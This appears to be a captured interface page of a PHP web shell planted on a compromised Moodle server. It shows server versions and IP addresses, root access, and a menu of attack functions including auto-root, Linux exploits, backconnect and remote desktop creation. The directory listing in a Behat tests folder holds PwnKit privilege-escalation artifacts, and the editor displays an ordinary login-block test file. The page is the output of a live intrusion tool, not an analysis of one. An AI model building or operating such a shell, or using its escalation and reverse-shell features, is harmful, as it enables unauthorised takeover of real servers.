Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
login /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
login_block.feature
983
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login_block.feature
@block @block_login Feature: Login from a block In order to make it easier to login As an user In need to login through a block Background: Given the following "users" exist: | username | password | firstname | lastname | email | | testuser | testpass | Test | User | student1@example.com | And the following "blocks" exist: | blockname | contextlevel | reference | pagetypepattern | defaultregion | | login | System | 1 | site-index | side-pre | Scenario: Login block visible to non-logged in users When I am on homepage Then "Login" "block" should exist Scenario: Login as student through login block Given I am on homepage When I set the field "Username" to "testuser" And I set the field "Password" to "testpass" And I click on "Log in" "button" in the "Login" "block" Then I should see "You are logged in as Test User" And "Login" "block" should not exist
Close